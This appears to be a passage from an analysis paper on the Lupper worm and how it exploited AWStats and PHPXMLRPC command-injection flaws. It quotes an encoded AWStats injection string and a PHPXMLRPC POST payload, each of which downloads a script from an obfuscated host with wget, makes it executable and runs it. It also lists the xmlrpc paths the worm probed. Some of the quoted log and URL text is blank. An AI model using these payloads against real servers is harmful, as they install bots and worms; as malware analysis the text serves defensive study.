The Lupper Worm

The following is an example Apache log entry of an attack by the Lupper worm, against the AWStats command-injection vulnerability:

[24/Dec/2005:13:02:18 +1300] GET

(Please note that the IP addresses and domains have been obfuscated throughout this paper.)

Certain versions of the awstats program would execute the code "echo%20YYY;cd%20%2ftmp%3bwget%20192%2e168%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;" in response to this request. This would cause the file at '' to be downloaded and stored in the /tmp directory. Then it would be made executable using the 'chmod +x nikons' and finally it would be executed.

This file 'nikons' was a shell script which attempted to download two programs; an IRC bot, identified as Tsunami.A and a variant of the Lupper worm. The Lupper variant tried to spread via scanning for hosts listening on port 80 and attempting to exploit the AWStats and PHPXMLRPC vulnerabilities. (Another Lupper variant is described as trying to exploit a file called - this behavior not present in our captured version.)

cd /tmp
chmod 744 d
chmod 744 qs

The bash script 'nikons', which downloads and executes two files from a webserver.

The worm probed for the following scripts: /xmlrpc/xmlrpc.php, /wordpress/xmlrpc.php, /phpgroupware/xmlrpc.php, /drupal/xmlrpc.php,
/blogs/xmlsrv/xmlrpc.php, /blog/xmlsrv/xmlrpc.php, /blog/xmlrpc.php
If present, any of these scripts would have been exploited via the following PHPXMLRPC exploit. The following POST payload downloads the tool "gicuji", a shell script to download and execute the Lupper and Tsunami binaries.

POST /xmlsrv/xmlrpc.php HTTP/1.1 ...
Content-Type: text/xml

<?xml version='1.0'?><methodCall><methodName>test.method</methodName><params><param><value><name>',' '));echo '_begin_';echo\ `cd /tmp;wget xxx.yy.zz.144/gicuji;chmod +x gicuji;./gicuji `;echo '_end_';exit;/*</name></value></param></params>\</methodCall>